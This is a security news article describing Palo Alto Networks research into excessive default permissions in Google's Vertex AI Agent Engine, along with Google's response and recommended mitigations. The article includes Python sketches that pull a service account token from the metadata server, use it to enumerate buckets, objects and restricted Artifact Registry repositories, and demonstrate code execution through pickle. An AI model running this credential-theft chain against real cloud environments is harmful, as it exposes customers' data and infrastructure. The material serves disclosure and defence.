Palo Alto Networks research demonstrates how default permissions in Google’s Vertex AI Agent Engine enable unauthorized read access to customer storage buckets and restricted internal repositories.

Palo Alto Networks security researchers have identified vulnerabilities in the permission model of Google Cloud Platform’s Vertex AI Agent Engine. The platform supports the development of autonomous AI agents that integrate with cloud services to execute complex tasks. Analysis of the default configuration for these agents shows that the associated service accounts receive broad permissions, which can be exploited to access sensitive data and internal infrastructure.

The investigation started with the deployment of a test AI agent built with Google's Agent Development Kit (ADK). The per-product, per-project service account (P4SA) created for the deployment, identified as service-<PROJECT-ID>@gcp-sa-aiplatform-re.iam.gserviceaccount.com, carried extensive default permissions. When the agent ran, a custom tool queried the instance metadata service, which returned the service account's credentials, including project details, identity information and the assigned OAuth scopes.
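The metadata query the researchers describe follows the standard Google Compute Engine metadata conventions: a plain HTTP request to metadata.google.internal with the mandatory "Metadata-Flavor: Google" header. The sketch below shows what such a tool could look like; it is illustrative and only returns real credentials when run inside a Google-managed runtime such as the agent's container.

```python
# Sketch: how an agent tool could read the instance metadata service to
# recover the attached service account's access token. The endpoint path
# and the "Metadata-Flavor: Google" header are the documented GCE metadata
# conventions; the call itself only succeeds inside a Google runtime.
import json
import urllib.request

METADATA_BASE = "http://metadata.google.internal/computeMetadata/v1"

def metadata_request(path: str) -> urllib.request.Request:
    """Build a metadata-server request; without the header the server
    rejects the call."""
    return urllib.request.Request(
        f"{METADATA_BASE}/{path}",
        headers={"Metadata-Flavor": "Google"},
    )

def fetch_default_token() -> dict:
    """Fetch the OAuth access token of the default service account
    (network call; works only from inside the agent's environment)."""
    req = metadata_request("instance/service-accounts/default/token")
    with urllib.request.urlopen(req, timeout=5) as resp:
        return json.load(resp)
```

The same endpoint family (e.g. .../default/email and .../default/scopes) yields the identity and scope information mentioned above.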

Using the extracted credentials, the researchers obtained read access to all Google Cloud Storage buckets in the consumer project — the customer’s own Google Cloud environment. The effective permissions covered storage.buckets.get, storage.buckets.list, storage.objects.get and storage.objects.list. This level of access bypassed intended isolation boundaries and allowed listing and retrieval of data stored in the project’s buckets.
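With a bearer token in hand, bucket and object enumeration needs nothing more than the public Cloud Storage JSON API. The helpers below sketch the two list calls corresponding to storage.buckets.list and storage.objects.list; the project ID and token values are placeholders.

```python
# Sketch: enumerating consumer-project storage with an extracted bearer
# token via the documented Cloud Storage JSON API. Only the requests are
# built here; executing them requires a valid token.
import urllib.parse
import urllib.request

def list_buckets_request(project_id: str, access_token: str) -> urllib.request.Request:
    """GET request for storage.buckets.list in the given project."""
    url = ("https://storage.googleapis.com/storage/v1/b?"
           + urllib.parse.urlencode({"project": project_id}))
    return urllib.request.Request(
        url, headers={"Authorization": f"Bearer {access_token}"})

def list_objects_request(bucket: str, access_token: str) -> urllib.request.Request:
    """GET request for storage.objects.list on one bucket."""
    url = f"https://storage.googleapis.com/storage/v1/b/{urllib.parse.quote(bucket)}/o"
    return urllib.request.Request(
        url, headers={"Authorization": f"Bearer {access_token}"})
```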

The same credentials also enabled access to restricted Artifact Registry repositories in Google’s producer project, the internal environment hosting Vertex AI services. Repositories such as us-docker.pkg.dev/cloud-aiplatform-private/reasoning-engine and cloud-aiplatform-private/llm-extension/reasoning-engine-py310 became reachable. Container images forming the core of the Vertex AI Reasoning Engine could be downloaded, while standard customer user accounts were denied access. Enumeration via the Artifact Registry API further exposed additional restricted packages and images whose existence was not previously visible to external parties.
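Enumeration of that kind can be expressed against the Artifact Registry REST API's packages.list method. The sketch below builds such a request for the producer-project repository named in the research; the location value and token are assumptions for illustration.

```python
# Sketch: listing packages in a restricted Artifact Registry repository
# via the documented REST method
# projects.locations.repositories.packages.list. Location and token
# values are illustrative placeholders.
import urllib.request

AR_API = "https://artifactregistry.googleapis.com/v1"

def list_packages_request(project: str, location: str, repo: str,
                          access_token: str) -> urllib.request.Request:
    """GET request enumerating packages under one repository."""
    parent = f"projects/{project}/locations/{location}/repositories/{repo}"
    return urllib.request.Request(
        f"{AR_API}/{parent}/packages",
        headers={"Authorization": f"Bearer {access_token}"})

# e.g. the restricted producer-project repository observed in the research:
# list_packages_request("cloud-aiplatform-private", "us", "reasoning-engine", token)
```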

Access extended to the tenant project, a dedicated Google-managed environment hosting the deployed Agent Engine instance. Storage buckets in this project contained deployment files including Dockerfile.zip, code.pkl and requirements.txt. The Dockerfile referenced internal Google Cloud Storage locations, such as gs://reasoning-engine-restricted/versioned_py/Dockerfile.zip, revealing aspects of the service's underlying infrastructure. The code.pkl file holds the agent's Python code serialized with Python's pickle module; the official Python documentation warns that deserializing pickle data from untrusted sources can lead to arbitrary code execution. The research flagged this as a potential risk, although exploitation was outside the study's scope.
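The pickle hazard is easy to demonstrate harmlessly: pickle lets an object nominate an arbitrary callable for its own reconstruction, so merely loading a crafted file executes code. The snippet below uses a benign side effect in place of attacker-controlled logic; it is a generic illustration of the pickle risk, not the actual contents of code.pkl.

```python
# Minimal, harmless demonstration of why deserializing an untrusted
# code.pkl is dangerous: __reduce__ tells pickle to recreate the object
# by calling an arbitrary function, so pickle.loads alone runs code.
import pickle

calls = []

def side_effect(tag):
    """Stand-in for attacker-controlled code; records that it ran."""
    calls.append(tag)
    return tag

class Payload:
    # "Recreate me by calling side_effect('pwned')"
    def __reduce__(self):
        return (side_effect, ("pwned",))

blob = pickle.dumps(Payload())
result = pickle.loads(blob)   # loading alone invokes side_effect
```

A tampered code.pkl in a reachable bucket would therefore execute attacker code in whatever process deserializes it.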

The agent’s default OAuth 2.0 scopes were also found to be broad and non-editable. These scopes could theoretically permit interaction with Google Workspace services such as Gmail, Calendar and Drive, although separate IAM permissions would still be required. Their presence by default deviates from least-privilege principles at the API-access level.
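A practical way to audit this is to inspect a token's granted scopes and compare them with a least-privilege allowlist. Google's documented OAuth 2.0 tokeninfo endpoint reports the scopes attached to an access token; the allowlist comparison below is a simple illustrative helper, not part of the research.

```python
# Sketch: auditing an access token's OAuth scopes against an allowlist.
# The tokeninfo endpoint is Google's documented OAuth 2.0 debugging
# endpoint; the allowlist itself is an illustrative placeholder.
import urllib.parse
import urllib.request

def tokeninfo_request(access_token: str) -> urllib.request.Request:
    """GET request that makes Google report the token's scopes."""
    url = ("https://oauth2.googleapis.com/tokeninfo?"
           + urllib.parse.urlencode({"access_token": access_token}))
    return urllib.request.Request(url)

def excess_scopes(granted: set, allowed: set) -> set:
    """Scopes present on the token but absent from the allowlist."""
    return granted - allowed
```

Any non-empty result from excess_scopes signals a deviation from least privilege worth investigating.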

The research team shared the findings with Google. In response, Google updated its official documentation to provide clearer details on how Vertex AI uses resources, accounts and agents. Google also recommended the Bring Your Own Service Account (BYOSA) method, which lets organizations assign a custom service account with narrowly defined permissions instead of relying on the default P4SA. Google confirmed that existing controls prevent the service agent from modifying production images, limiting certain cross-tenant risks.

The study illustrates practical implications of default permission scoping in AI platforms. Overly permissive service accounts can convert an ostensibly helpful agent into a vector for data exfiltration or infrastructure mapping. The combination of service-agent access, internal artifact exposure and insecure serialization formats creates layered risks that may not be immediately apparent during standard deployment. Organizations using Vertex AI are advised to review permission boundaries, adopt custom service accounts where possible, restrict OAuth scopes and perform security validation before production use.

By Jakob Jung

Dr. Jakob Jung is Editor-in-Chief of Security Storage and Channel Germany. He has been working in IT journalism for more than 20 years. His career includes Computer Reseller News, Heise Resale, Informationweek, Techtarget (storage and data center) and ChannelBiz. He also freelances for numerous IT publications, including Computerwoche, Channelpartner, IT-Business, Storage-Insider and ZDnet. His main topics are channel, storage, security, data center, ERP and CRM. Contact via email: jakob.jung@security-storage-und-channel-germany.de
